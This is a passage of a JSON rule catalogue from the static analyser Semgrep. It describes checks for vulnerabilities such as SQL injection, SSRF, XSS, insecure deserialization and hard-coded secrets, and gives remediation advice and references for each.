- [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","id":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","name":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"help":{"markdown":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors)\n - [https://flask.palletsprojects.com/en/3.0.x/debugging/](https://flask.palletsprojects.com/en/3.0.x/debugging/)\n","text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"helpUri":"https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","id":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","name":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf","id":"java.servlets.security.tainted-ssrf.tainted-ssrf","name":"java.servlets.security.tainted-ssrf.tainted-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf.tainted-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"help":{"markdown":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2)\n","text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2","id":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","name":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-multiprocess2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"help":{"markdown":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n","text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"helpUri":"https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","id":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","name":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"help":{"markdown":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session)\n - [https://en.wikipedia.org/wiki/Session_poisoning](https://en.wikipedia.org/wiki/Session_poisoning)\n","text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session","id":"php.lang.security.injection.tainted-session.tainted-session","name":"php.lang.security.injection.tainted-session.tainted-session","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-session.tainted-session"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","id":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","name":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"help":{"markdown":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"helpUri":"https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","id":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","name":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"help":{"markdown":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n","text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","id":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","name":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","id":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","name":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint","id":"rust.rocket.nosql.mongodb-taint.mongodb-taint","name":"rust.rocket.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection","id":"java.lang.security.audit.el-injection.el-injection","name":"java.lang.security.audit.el-injection.el-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.el-injection.el-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"help":{"markdown":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string","id":"java.spring.security.injection.tainted-html-string.tainted-html-string","name":"java.spring.security.injection.tainted-html-string.tainted-html-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-html-string.tainted-html-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","id":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","name":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","id":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","name":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli)\n - [https://www.npmjs.com/package/pg](https://www.npmjs.com/package/pg)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.pg.express-pg-sqli.express-pg-sqli","id":"javascript.express.pg.express-pg-sqli.express-pg-sqli","name":"javascript.express.pg.express-pg-sqli.express-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.pg.express-pg-sqli.express-pg-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","id":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","name":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"help":{"markdown":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate)\n - [https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345](https://forum.balancer.fi/t/reentrancy-vulnerability-scope-expanded/4345)\n","text":"$VAR.getRate() call on a Balancer pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","id":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","name":"solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.balancer-readonly-reentrancy-getrate.balancer-readonly-reentrancy-getrate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"help":{"markdown":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off)\n - [https://docs.djangoproject.com/en/3.1/ref/settings/#templates](https://docs.djangoproject.com/en/3.1/ref/settings/#templates)\n - [https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates](https://docs.djangoproject.com/en/3.1/topics/templates/#django.template.backends.django.DjangoTemplates)\n","text":"Detected a Context with autoescape disabled. If you are rendering any web pages, this exposes your application to cross-site scripting (XSS) vulnerabilities. Remove 'autoescape: False' or set it to 'True'."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","id":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","name":"python.django.security.audit.xss.context-autoescape-off.context-autoescape-off","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.context-autoescape-off.context-autoescape-off"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 